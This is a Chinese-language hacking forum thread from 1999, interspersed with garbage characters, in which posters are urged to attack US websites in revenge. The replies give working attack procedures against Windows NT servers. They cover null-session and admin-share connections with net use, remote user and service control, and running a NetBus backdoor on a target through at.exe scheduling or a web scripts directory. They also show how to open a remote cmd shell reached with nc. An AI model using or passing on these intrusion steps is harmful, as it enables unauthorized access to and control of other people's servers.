《版主頁黑客工具和文章的幾個(gè)問題》中提到:
& D- @9 Y& y% |- O8 h0 p v6 ^3 _請(qǐng)教��,從版主頁上載得PINGER����,GRINDER,LETMEIN等��,卻不能用���,PINGER安裝后��,明明安裝前文件有1M多�,但安裝完后生成的文件夾中只有PINGER����。EXE,40多K,運(yùn)行PINGER�,設(shè)置好IP,點(diǎn)PING��,彈出一個(gè)窗口(C++���。�����。�����。)���,說出錯(cuò),然后關(guān)閉了��,何故��,是不是安裝有誤����? 2��。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN�。EXE到不存在的NETAPI32。DLL���;NETGROUPGETUSERS�。 是否說明需要NETAPI32�。DLL文件,哪里有該DLL�。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運(yùn)行以下步驟等���,是否要求我的操作系統(tǒng)也是WINNT4。0 ����,應(yīng)該不是吧? 4�����。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT����? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用�,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章��,以提高我國黑客水平�。+ P1 H: l( b' t" M% n8 }
> 我的機(jī)子MMX166,WIN98���,2����。5G�,32M內(nèi)存。
4 G: P; E3 {: Y6 r& w8 ]9 A. d- i" D& |* u$ [) {, q; f
黑客并不神秘����,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)�,輔助相關(guān)的工具,就可以成功�����。& s& y& C$ o) N
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�,我們強(qiáng)烈建議,你一定要安裝NT��,對(duì)于你的機(jī)器配制�����,和我們現(xiàn)在差不多��,只是比你多了32M內(nèi)存��,2G硬盤�。- T5 V! r5 G2 ~6 q$ \; ]
其實(shí)�����,攻擊敵站���,利用其操作系統(tǒng)本身的工具就可以了�����,比如�,我們?cè)贜T上攻擊某服務(wù)器,該服務(wù)器為NT4.0���,我們將做如下簡(jiǎn)單事情就有可能成功�����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�����,做法如下:
! b. q# y W+ _4 Znet use \\111.111.111.111\ipc$ "" /user:""
" f. f: T' ^; P2 Rnet.exe是NT的工具文件����,該命令將和目標(biāo)服務(wù)器建立Null Session�,如果成功,你可以查看該服務(wù)器上的共享目錄:1 o- H$ g" n: ~! F( @5 ?
net view \\111.111.111.111) ?( `, N( x" }0 j7 b3 D
當(dāng)然����,如果你有該NT管理員密碼,就更好辦了���,假設(shè)其管理員Admin密碼為fuck:
& e! k0 C' f/ y% o7 @0 z( T+ E/ nnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"; ?$ _, O {8 P/ [! w8 |' E2 y
命令成功后��,幾乎所有目標(biāo)NT上的配制����,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:, D( d% {1 {7 Q: V! o9 R
1��、查看或修改遠(yuǎn)程機(jī)器上的硬盤���,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
" c$ X8 Y) a8 \; {5 _net use x: \\111.111.111.111\c$2 ~2 D# p3 R4 Q1 p& h% F9 W- u1 u
net use y: \\111.111.111.111\d$" `8 Z* z! f; K$ L& b, U% B6 B3 v
這樣�,目標(biāo)NT上的C、D盤分別被影射為你本地的X����、Y盤,你想怎么做都可以...
; a' }, N9 ^ A8 }; F+ V/ b2 e2����、管理目標(biāo)NT的用戶:
$ E# K9 q5 H, W+ }從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”7 U' M8 ~4 D6 y$ a+ X3 V
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以�����,和管理你本地的一樣
+ z3 @8 M7 l5 B# F3�、管理目標(biāo)NT的服務(wù)& L4 o4 S5 X/ b
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
- G; K* C0 k+ M1 i: p這樣你可以管理目標(biāo)NT上的服務(wù)����,共享目錄; ?. W5 Y" M0 b
4�����、IIS管理8 @+ x- b0 I6 Z2 K, {9 ?
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111; t0 X" c3 Z0 R
目標(biāo)NT的FTP�、WWW服務(wù)你就可以重新配置# E+ X( e% Q+ E' y# M" E- q4 ~
5、事件管理+ Y, A* i3 G% {$ m
“事件查看器”->連接到服務(wù)器->111.111.111.111
) \' M* f- _% J/ [$ E3 _
( w' r; r1 c6 ~( Y還有更多的東西����,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的����。
1 U3 M: e L* |; e! R6 @7 r% }
P0 b& d$ W2 j' w' t$ f& y3 M8 c當(dāng)然,98,95也能做一些事情����,但很麻煩,比如:
$ d2 S' b. p; w) e1 M! Mnet use \\111.111.111.111\ipc$( q- L, L7 P3 ]% v6 q& h
net use z: \\111.111.111.111\d$6 a, ?* h; I7 F: `* E9 p
但其后不能帶參數(shù)���,即改用其他用戶或密碼�����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98�,改用該用戶和密碼登錄,方可實(shí)現(xiàn)��,你可以連接目標(biāo)NT上的共享資源���,但不能進(jìn)行管理�,如用戶�、事件等
- p" L' s, u2 H* F2 `2 C0 s" `! V1 i) p
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國的站點(diǎn)���,花點(diǎn)時(shí)間,裝個(gè)NT吧��,NT Workstation也可以����!
) y- n" O2 ?0 h3 z( Q l+ K這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用���!
* n4 G' j0 y/ G1 l/ Q( E/ a7 y6 G2 z& W9 A: x' @7 J+ {
2 T9 ?( B+ o" k4 S- Z--------------------------------------------------------------------------------
; }( b& K. @0 N7 d9 B2 ?" f2 v3 p. J' r- {) x* @
>quack于1999-06-12�����,23:37:44+ [; K% D1 ?1 b9 F
在大作《幾個(gè)有關(guān)黑的問題》中提到:
, D n5 ?' ~+ a. h3 A$ d首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!�。9 x# L5 |2 R" E: K4 ~5 _
( {) X4 ?9 S m
killusa于1999-06-13,03:25:15+ G; W/ |' P. Z }$ _0 A' U
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:$ s6 j+ J7 c) g- X' [
: Y6 O2 V" Z- L N( y; |$ Q
letmein.exe 暫時(shí)沒有mypwd參數(shù)�,十分抱歉
8 z, t8 O2 H, K x, @4 f6 P% F. N6 tpinger程序,只是利用ping來尋找主機(jī)�,每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址���,比如有些服務(wù)器供應(yīng)商��,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP�����,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址���,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP�����,而無主機(jī)名。另外��,有些服務(wù)器是非NT的操作系統(tǒng)�����,有時(shí)將不會(huì)顯示主機(jī)名�。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置��,也會(huì)出現(xiàn)上面的情況�。1 r1 J$ f! T$ F! {- t
5 z) p0 w: }1 S8 w
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以�����,netbus.exe是不用上傳的��,只需在目的
: o8 ^! m8 \( |% w9 f/ K! r0 W4 }服務(wù)器上運(yùn)行ntsrv.exe�,而在目的服務(wù)器運(yùn)行該程序有很多種方法:. P/ S' b* z- [- s
0 c/ Y0 N2 n' Z- |' X
1�、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法�����,可在自己的NT Dos窗口下鍵入以下:
6 ~) a, C8 y7 Y6 X( [& r
0 V0 c$ F! ~ S7 m" T+ a) MC:\>net start schedule' \* e8 X, d' L4 t/ w9 Y, u/ r* w
Schedule 正在啟動(dòng)服務(wù).....! K: k3 `, f) q" ]$ X
Schedulw 服務(wù)啟動(dòng)成功。
) }' N8 u9 I' z5 PC:\>at /?
6 W8 w+ k4 f. U; l: c+ \5 xAT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序����。
% ~$ l9 A/ K9 n運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。- K: z) Y; u# e- c
$ T1 |# i) k" B9 O0 H# ]AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
% U, n7 w% y7 {4 G3 [$ p C- XAT [\\computername] time [/INTERACTIVE]
5 N: i E6 X5 |: X6 F5 ?4 \ F[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
: L5 q% G6 ]1 Y* w- S) ] J2 V* R1 V T- g
\\computername 指定遠(yuǎn)程計(jì)算機(jī)����。 如果省略這個(gè)參數(shù)
" m$ d* N" K% x" E" H2 [' ~命令會(huì)被排定在本機(jī)上運(yùn)行。6 g' D- f" @9 D, y, L
id 指定給排定進(jìn)度命令的識(shí)別號(hào)��。
2 |: P6 p( U$ r9 g! o! p) Z" T% `( ~! P, L7 l
/delete 刪除某個(gè)已排定進(jìn)度的命令�。如果省略標(biāo)識(shí),計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除�。
( f) d% _) V2 d2 C2 [/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。* A+ j8 v8 B8 u9 A- X8 ~
time 指定命令運(yùn)行的時(shí)間。
+ Z9 D* ~ B) H6 P) U. i4 c/interactive 允許作業(yè)在運(yùn)行時(shí)�,與用戶通過桌面交互。
A A. `: f- r5 I+ G
6 Z0 k0 ]1 Y& x$ P% ~/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令���。6 \% }, c/ F% P H4 q
如果省略日期����,則默認(rèn)為在每月的本日運(yùn)行。
- x- b/ y9 d, h0 E' h
3 L1 p. a, ?/ Y* f3 v/next:date[,...] 指定在下一個(gè)指定日期 (如���,下周三)�����,運(yùn)行命令��。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行。. C$ |: G) B! @0 E7 T% S/ y' T
7 ?; \6 i; C/ j"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�。
2 d9 D$ z$ j2 o' f0 P7 t; C) t- H. Q: ^, g4 g& l& Y6 r5 i1 C
C:\>" H+ g5 k4 T1 r+ L; p( y2 K) C+ I
+ V/ U7 Z9 `4 x, b/ L! z
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
$ m7 ^3 f7 P" k% n1 f( r1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser": _( C1 w A. w) I
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
! n2 S, s/ w$ x* K% u, q3 Z3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想�,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間�����,然后:- |8 k8 }+ \7 q* g* s, P
at \\x.x.x.x 00:00 ntsrv.exe /port:64321$ V! V- R5 C$ Z/ \: H! H! A/ \
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量�����,等一會(huì)后�,再在本地啟動(dòng)netbus.exe,鍵入目的服務(wù)器得ip地址或hostname�,連接!具體使用可參照 "How to get in nt"���,比如第一種方法���,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器����,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序�����,就ok了�!第二種方法是利用netbus的“App redirect”功能,啟動(dòng)遠(yuǎn)程telnet服務(wù)�,如下:在netbus中擊“App redirect”����,鍵入"C:\>winnt\system32\cmd.exe"�,Port為:4321,服務(wù)就啟動(dòng)了�����,然后在本地運(yùn)行:nc x.x.x.x 4321����,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
5 Q5 A' _$ n0 C1 g& W5 J+ m9 I. U/ j' gMicrosoft(R) Windows NT(TM)
( [; o; \0 k5 [! w(C) Copyright 1985-1996 Microsoft Corp.% d8 J) D. m0 W- A. P% {) J
C:\>
0 J" m {4 H( x2 y( l* R4 w- P& q' |
; t7 ]& Z1 b2 {9 U& d) R. f2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器$ r2 W2 k- L( H- V' x7 j
, }! `; Z; G6 F3 V, i將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�����,如cgi-bin或scripts�,然后在瀏覽器鍵入url如:* L& O! ?2 P9 c3 p9 R
http://x.x.x.x/scripts/ntsrv.exe /port:64321/ U$ _' s% ]' `9 ~; ]8 P# @
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321 [! E5 d5 y! `5 c3 C$ e
該程序就啟動(dòng)了9 N# |! [( K# O% v
4 s7 Z; p: T# A9 X6 Z我只提這幾中方法!
) t. }3 [' s3 h( T, I- ^要成功��,必須打好基礎(chǔ)工�����,對(duì)操作系統(tǒng)充分了解!
* D5 X$ ~9 K- m; u. o2 J- p3 z$ t7 m7 N D) ~, T6 c
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡